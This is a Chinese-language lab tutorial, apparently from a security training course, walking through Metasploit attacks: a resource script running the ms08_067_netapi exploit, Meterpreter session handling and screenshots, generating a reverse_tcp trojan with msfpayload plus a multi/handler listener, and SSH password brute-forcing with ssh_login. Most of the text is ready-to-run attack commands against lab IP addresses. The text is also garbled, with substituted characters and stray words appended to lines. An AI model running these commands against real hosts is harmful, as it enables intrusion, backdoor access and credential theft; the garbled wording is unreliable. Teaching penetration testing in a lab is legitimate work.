脚本攻击、后渗透攻击(网安全实训第四天)

1.经过脚本快速攻击shell

2.后渗透攻击续windows

1.经过脚本快速攻击api

咱们能够经过msfconsole -x “msfconsole内输入的命令”实现快速攻击,进一步,咱们能够将攻击须要执行的命令写成脚本,进行攻击。服务器

(1)编辑脚本session

vi abin.rc

输入如下内容。(根据实际状况修改)ssh

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.183.132
set LHOST 192.168.183.131
exploit

(2)执行脚本tcp

msfconsole -r abin.rc

经过之星脚本文件,直接攻击成功,获取shell。工具

补充:若是同时攻击成功多个主机,能够经过sessions来管理。线程

background 将当前会话放在后台
sessions -l 查看已经创建的会话
sessions -i 1 进入会话

 

2.后渗透攻击续3d

 

(1)截取屏幕

因为截屏须要在图形界面才能够看到,因此咱们先进入图形界面。

startx
msfconsole -r abin.rc
screenshot (截屏)

截取的对方桌面:

其余命令能够经过输入 ? 查看:

(2)木马攻击

    1.生成木马文件

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.138.129 LPORT=5555 X >abin.exe

    2.木马服务器配置

    进入msfconsole,使用对应模块,这里使用exploit/multi/handler模块:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.183.129 (设置监听主机,也就是bt5的地址)

set LPORT 5555 (设置监听端口,也就是上面的5555)

 

exploit (进入监听模式)

 

当有主机运行咱们开始生成的木马程序,就能够得到对方主机shell。

 

3.暴力破解

    (1)使用msf自带模块进行暴力破解

进入msfconsole控制台:

msfconsole

 

使用auxiliary/scanner/ssh/ssh_login模块:

use auxiliary/scanner/ssh/ssh_login

 

show options

设置目标主机:

set RHOSTS 192.168.183.130

设置用户名:

set USERNAME msfadmin

也能够使用:set USER_FILE 从字典读取用户名。

设置密码字典:

set PASS_FILE pass.txt

pass.txt是我本身编写的一个简单字典,也能够根据社会工程学收集的信息,使用工具进行生成。

设置线程:(线程越多,速度越快,固然,须要的电脑配置越高)

set THREADS 10

开始暴力破解:

exploit

咱们能够看到,已经爆破出ssh登陆密码。

相关文章
相关标签/搜索